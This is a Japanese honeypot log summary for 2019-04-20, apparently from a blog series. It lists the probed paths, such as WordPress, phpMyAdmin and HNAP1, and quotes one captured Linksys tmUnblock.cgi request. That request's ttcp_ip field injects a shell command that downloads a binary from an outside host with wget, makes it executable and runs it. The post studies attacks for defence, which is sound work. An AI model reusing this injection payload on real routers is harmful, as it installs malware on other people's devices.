honeypotの簡易解析20日目

2019-04-20のアクセス数は71件でした。

■送信元IPアドレスの数は 56件です。

■メソッドの一覧と件数は以下です。

method総数
GET67
HEAD3
POST1
合計 結果71

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET51
///?author=1GET1
///wp-json/wp/v2/users/GET1
/HNAP1/GET2
/manager/htmlGET1
/phpmy/scripts/setup.phpGET1
/phpMyAdmin/scripts/setup.phpGET2
/pma/scripts/setup.phpGET1
/redirect.phpHEAD1
/robots.txtHEAD1
/tmUnblock.cgiPOST1
/w00tw00t.at.blackhats.romanian.anti-sec:)GET1
/wp-login.phpGET1
http://110.249.212.46/testget?q=23333&port=80GET5
http://112.124.42.80:63435/HEAD1

気になるlog

-=-=22件目のlog=-=-

[2019-04-20 05:33:48+0900] 207.154.236.43 188.166.41.194:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False
POST /tmUnblock.cgi HTTP/1.1
 Host: 188.166.41.194:80
 Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Accept: /
 User-Agent: python-requests/2.20.0
 Content-Length: 227
 Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F134.209.226.252%2Fvb%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

よく来るlinksysの脆弱性ですが、最近翌日でも検体をgetできません。virustotalはこちら

マルウェアの設置先を頻繁に変更していると思われます。

tmUnblock.cgiを検知したら、他のサーバに連携させて収集させたいな〜